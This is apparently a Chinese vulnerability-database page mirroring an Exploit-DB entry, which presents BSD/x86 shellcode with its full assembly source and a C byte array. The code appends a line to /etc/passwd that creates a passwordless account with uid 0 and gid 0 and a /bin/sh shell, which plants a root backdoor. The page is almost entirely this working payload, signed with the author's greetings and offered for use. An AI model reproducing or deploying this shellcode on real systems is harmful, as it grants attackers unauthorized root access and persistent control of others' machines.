BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057132 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43642
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*************************************************************
writes the line for user in /etc/passwd with uid&gid == 0 
OS: *BSD
length: 74
	written by dev0id dev0id@mail.ru (rootteam.void.ru)
	  		  #rus-sec /Efnet.org
greetz:
	mig
	nerf
	
*************************************************************
BITS 32
main:
	xor	eax,eax
	push	eax
	push byte 0x64
	push word 0x7773
	push long 0x7361702f
	push long 0x6374652f
	mov	ebx,esp
	mov	al,0x0a
	push	eax
	push	ebx
	mov	al,5
	push	eax
	int	0x80
	

	mov	edx,eax

	push long 0x0a206873
	push long 0x2f6e6962
	push long 0x2f3a2f3a
	push long 0x313a303a
	push long 0x303a3a31
	mov ebx,esp
	mov	al,20
	push	eax
	push	ebx
	push	edx
	mov	al,4
	push	eax
	int	0x80

	mov	al,1
	push	eax
	int	0x80

*************************************************************



char shellcode[] =
	"\x31\xc0\x50\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68"
	"\x2f\x65\x74\x63\x89\xe3\xb0\x0a\x50\x53\xb0\x05\x50\xcd\x80"
	"\x89\xc2\x68\x73\x68\x20\x0a\x68\x62\x69\x6e\x2f\x68\x3a\x2f"
	"\x3a\x2f\x68\x3a\x30\x3a\x31\x68\x31\x3a\x3a\x30\x89\xe3\xb0"
	"\x14\x50\x53\x52\xb0\x04\x50\xcd\x80\xb0\x01\x50\xcd\x80";